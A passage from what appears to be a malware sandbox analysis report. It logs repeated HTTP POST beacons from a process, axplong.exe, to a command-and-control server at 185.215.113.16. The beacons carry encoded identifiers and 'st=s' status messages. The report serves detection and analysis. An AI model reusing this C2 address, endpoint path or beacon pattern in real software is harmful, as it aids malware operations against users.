                                                                  Date: Fri, 27 Sep 2024 09:31:01 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:02.054727077 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:02.285742998 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  54 | 192.168.2.6 | 65116 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:02.586646080 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:03.309027910 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:03.311400890 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:03.538702011 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  55 | 192.168.2.6 | 65117 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:03.655917883 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:04.352302074 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:04.355447054 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:04.577923059 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  56 | 192.168.2.6 | 65118 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:04.687051058 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:05.394244909 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:05.397620916 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:05.629041910 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:05 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  57 | 192.168.2.6 | 65119 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:05.772352934 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:06.447398901 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:06 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  58 | 192.168.2.6 | 65120 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:06.457762003 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:07.161418915 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  59 | 192.168.2.6 | 65121 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:07.284039021 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:08.019320965 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  60 | 192.168.2.6 | 65122 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:08.029510975 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:08.733987093 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:08 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  61 | 192.168.2.6 | 65123 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:08.862838984 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:09.565476894 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  62 | 192.168.2.6 | 65124 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:09.588495970 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:10.306952953 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  63 | 192.168.2.6 | 65125 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:10.424969912 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:11.116766930 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:10 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  64 | 192.168.2.6 | 65126 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:11.148034096 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:11.871057987 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  65 | 192.168.2.6 | 65127 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:11.984565973 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  66 | 192.168.2.6 | 65128 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:12.012002945 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:12.749566078 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:12 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  67 | 192.168.2.6 | 65129 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:12.865654945 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:13.584402084 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0
                                                                  Sep 27, 2024 11:31:13.593420029 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:13.821906090 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  68 | 192.168.2.6 | 65130 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:13.945755005 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:14.634277105 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:14 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  69 | 192.168.2.6 | 65131 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:14.643163919 CEST | 314 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 160
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                  Sep 27, 2024 11:31:15.349911928 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 7 <c><d>0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  70 | 192.168.2.6 | 65132 | 185.215.113.16 | 80 | 1924 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Sep 27, 2024 11:31:15.471771002 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 185.215.113.16
                                                                  Content-Length: 4
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 73 74 3d 73
                                                                  Data Ascii: st=s
                                                                  Sep 27, 2024 11:31:16.183041096 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 27 Sep 2024 09:31:16 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Refresh: 0; url = Login.php
                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1 0


                                                                  Target ID:0
                                                                  Start time:05:29:09
                                                                  Start date:27/09/2024
                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                  Imagebase:0xcf0000
                                                                  File size:1'923'072 bytes
